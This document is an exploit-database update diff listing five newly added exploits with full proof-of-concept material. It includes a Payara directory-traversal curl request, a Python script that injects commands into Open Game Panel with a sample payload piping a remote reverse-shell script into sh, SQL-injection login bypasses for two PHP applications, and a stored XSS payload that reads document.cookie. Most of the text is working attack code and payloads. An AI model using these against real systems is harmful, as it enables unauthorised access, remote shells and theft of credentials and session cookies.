DB: 2021-10-05

5 changes to exploits/shellcodes

Payara Micro Community 5.2021.6 - Directory Traversal
Lodging Reservation Management System 1.0 - SQL Injection / Authentication Bypass
Open Game Panel - Remote Code Execution (RCE) (Authenticated)
Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass
Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)

exploits/multiple/webapps/50371.txt

@@ -0,0 +1,35 @@
+# Exploit Title: Payara Micro Community 5.2021.6 - Directory Traversal
+# Date: 01/10/2021
+# Exploit Author: Yasser Khan (N3T_hunt3r)
+# Vendor Homepage: https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
+# Software Link: https://www.payara.fish/downloads/payara-platform-community-edition/#x
+# Version: Payara Micro Community 5.2021.6
+# Tested on: Linux/Windows OS
+# CVE : CVE-2021-41381
+
+https://nvd.nist.gov/vuln/detail/CVE-2021-41381
+
+Proof of Concept:
+
+Step1: Open the browser check the version of the payara software
+
+Step2: Add this Path at end of the URL
+/.//WEB-INF/classes/META-INF/microprofile-config.properties
+
+Step3: Check the response with match containing
+"payara.security.openid.default.providerURI="
+
+"payara.security.openid.sessionScopedConfiguration=true"
+
+Step4 : If any of these contents in the response then the application is vulnerable to Directory Traversal Vulnerability.
+
+Step5: Alternatively we can use CURL by using this command:
+
+Request:
+curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties
+
+Reference:
+
+https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
+https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
+https://nvd.nist.gov/vuln/detail/CVE-2021-41381

exploits/multiple/webapps/50373.py

@@ -0,0 +1,72 @@
+# Exploit Title: Open Game Panel - Remote Code Execution (RCE) (Authenticated)
+# Google Dork: intext:"Open Game Panel 2021"
+# Date: 08/14/2021
+# Exploit Author: prey
+# Vendor Homepage: https://www.opengamepanel.org/
+# Software Link: https://github.com/OpenGamePanel/OGP-Website
+# Version: before 14 Aug patch (https://github.com/OpenGamePanel/OGP-Website/pull/561/commits)
+# Tested on: CentOS Linux 5.4.102
+
+#Before the patch, it was possible to inject system commands on "map" parameter when launching a new counter-strike server just by putting the command=
+ betwen ';', the user needs to be authenticated for this.
+
+
+import requests
+
+banner = """
+@
+@                                                     @@&    @@@@@/
+@                                                      @&   #@@@@@&       .=
+,/%@#
+@                                                     @@@@@@@@@@@@@((%@@@@*
+@                                                     #@@@@@@@@@@@@@@@*%@,
+@                                                     @@@@@@@@@@@@@@&@@@@
+@                                                    &@@@@@@@@@/   &@@@.
+@                                                    @@@@@@@@@(
+@                                                    @@@@@@@@@@@@@&*
+@                                                     &@@@@@@@@@@@@@@@@%
+@                                                        ,&@@@@@@@@@@@@@
+@                                                          %@@@@@@@.
+@                                              .%@@@@@@@@% @@@@@@
+@                                          @@@@@#       .&@@@@#
+@            (@@@@@@@@@@@.             .@@@&               @@%
+@       .@@@@@,         #@@@@@*      #@@@                   @@@@@
+@     @@@&                   &@@@.  @@@
+@  ,@@@                         @@@@@@
+@ @@@                            %@@@,
+@&@@                              @@@,
+@@@@
+@@@@
+
+ *@@@@@# @@  *@@  %@  @@@  @@      @@@@@/  @@@   @@@       ,@@@   ,@(    .@=
+%
+ *@/  @@ .@/ @(@  @@  @@@( @@         ,@(  @@@* @#@@       @@(@   ,@(    .@=
+%
+ *@@@@@@  @@ @ &&.@(  @@ @.@@       @@@@   @@.@(@ @@      (@. @@  ,@(    .@=
+%
+ *@/      %@(@  @@@   @@ *@@@          @@  @@ @@. @@      @@@@@@, ,@(    .@=
+%
+ *@/       @@*  @@@   @@  %@@      @@@@@*  @@     @@     &@    @@ ,@@@@@ .@=
+@@@@
+
+##You can get mod_id and home_id on your game panel URL when you are logged
+
+"""
+print(banner)
+
+target = input("Target url:  (eg: https://panel.example.org)\n")
+opengamepanel_web = input("opengamepanel_web Cookie: (eg: kulonmu5ldu71nmggv2p571nu1)\n")
+mod_id = input("Mod_id value: (eg: 2437)\n")
+home_id = input("Home_id value: (eg: 3737)\n")
+server_ip_port = input("Server IP:port: (eg: 192.168.69.69:42069)\n")
+command = input("Payload: (eg: curl https://reverse-shell.sh/1.1.1.1:1337|sh)\n")
+
+url = target + "/home.php?m=gamemanager&p=game_monitor"
+cookies = {"opengamepanel_web": opengamepanel_web}
+headers = {"Content-Type": "application/x-www-form-urlencoded"}
+data = {"mod_id": mod_id, "home_id": home_id, "ip_port": server_ip_port, "map": ";" + command + ";", "start_server": "whatever"}
+try:
+    requests.post(url, headers=headers, cookies=cookies, data=data)
+except:
+    print("Something went wrong, check your inputs or try manually exploiting the map parameter")
+print("Finished. you can now literally read the file $HOME/OGP/Cfg/Config.pm for the root password yaay! (CVE-2021-37157)")

exploits/php/webapps/50372.txt

@@ -0,0 +1,45 @@
+# Exploit Title: Lodging Reservation Management System 1.0 - SQL Injection / Authentication Bypass
+# Date: 2021-09-20
+# Exploit Author: Nitin Sharma(vidvansh)
+# Vendor Homepage: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code
+# Version: v1.0
+# Tested on: Windows 10 - XAMPP Server
+
+
+# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts.
+
+#Steps-To-Reproduce:
+Step 1 Go to the Product admin panel http://localhost/lodge/admin/login.php.
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in the burp suite
+Step4 – Change the username to ' OR 1 -- -  and password to ' OR 1 -- -.
+Step 5 – Click forward and now you will be logged in as admin.
+
+# PoC:
+
+POST /lodge/classes/Login.php?f=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 49
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/lodge/admin/login.php
+Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+
+
+
+# Authentication Bypass:
+
+# Go to admin login page (http://localhost/lodge/admin/login.php), then use below payload as username and password =>
+Username: ' or 1 -- -
+Password: ' or 1 -- -

exploits/php/webapps/50374.txt

@@ -0,0 +1,36 @@
+# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass
+# Date: 2021-10-02
+# Exploit Author: Jordan Glover
+# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
+# Version: v1.0
+# Tested on: Windows 10 + XAMPP v3.3.0
+
+Steps-To-Reproduce:
+Step 1 Go to the admin panel http://localhost/bsenordering/admin/login.php
+Step 2 – Enter the default admin username janobe and enter password test
+Step 3 – Click on Sign in and capture the request in the Burp Suite
+Step 4 – Change the user_email to janobe' or '1'='1
+Step 5 – Click forward and now you will be logged in as an admin.
+
+POC
+
+POST /bsenordering/admin/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 40
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/bsenordering/admin/login.php
+Cookie: PHPSESSID=him428198e798r23eagi9mapjk
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+user_email=janobe' or '1'='1&user_pass=test&btnLogin=

exploits/php/webapps/50375.txt

@@ -0,0 +1,74 @@
+# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)
+# Date: 2021-10-03
+# Exploit Author: Jordan Glover
+# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
+# Version: v1.0
+# Tested on: Windows 10 + XAMPP v3.3.0
+
+Young Entrepreneur E-Negosyo System 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.
+
+Step 1 - Create a new product to sell - http://localhost/bsenordering/admin/products/index.php?view=add
+Step 2 - Fill out all required fields to create a new product. Input a payload in the product description field - <script>alert(document.cookie)</script>
+Step 3 - Save the product.
+
+The stored XSS triggers for all users that navigate to the home page.
+
+POC
+
+POST /bsenordering/admin/products/controller.php?action=add HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------375756297829058981022228786743
+Content-Length: 1203
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/bsenordering/admin/products/index.php?view=add
+Cookie: PHPSESSID=794albocs4b1st3m9hsileorpg
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+-----------------------------375756297829058981022228786743
+Content-Disposition: form-data; name="OWNERNAME"
+
+Test
+-----------------------------375756297829058981022228786743
+Content-Disposition: form-data; name="OWNERPHONE"
+
+0000000000
+-----------------------------375756297829058981022228786743
+Content-Disposition: form-data; name="PRODESC"
+
+<script>alert(document.cookie)</script>
+-----------------------------375756297829058981022228786743
+Content-Disposition: form-data; name="CATEGORY"
+
+3
+-----------------------------375756297829058981022228786743
+Content-Disposition: form-data; name="ORIGINALPRICE"
+
+100
+-----------------------------375756297829058981022228786743
+Content-Disposition: form-data; name="PROPRICE"
+
+100
+-----------------------------375756297829058981022228786743
+Content-Disposition: form-data; name="PROQTY"
+
+100
+-----------------------------375756297829058981022228786743
+Content-Disposition: form-data; name="image"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------375756297829058981022228786743
+Content-Disposition: form-data; name="save"
+
+
+-----------------------------375756297829058981022228786743--

files_exploits.csv

@@ -44483,3 +44483,8 @@ id,file,description,date,author,type,platform,port
 50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andreas Finstad",webapps,multiple,
 50367,exploits/php/webapps/50367.py,"CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
 50370,exploits/php/webapps/50370.txt,"Directory Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
+50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",1970-01-01,"Yasser Khan",webapps,multiple,
+50372,exploits/php/webapps/50372.txt,"Lodging Reservation Management System 1.0 - SQL Injection / Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
+50373,exploits/multiple/webapps/50373.py,"Open Game Panel - Remote Code Execution (RCE) (Authenticated)",1970-01-01,prey,webapps,multiple,
+50374,exploits/php/webapps/50374.txt,"Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Jordan Glover",webapps,php,
+50375,exploits/php/webapps/50375.txt,"Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)",1970-01-01,"Jordan Glover",webapps,php,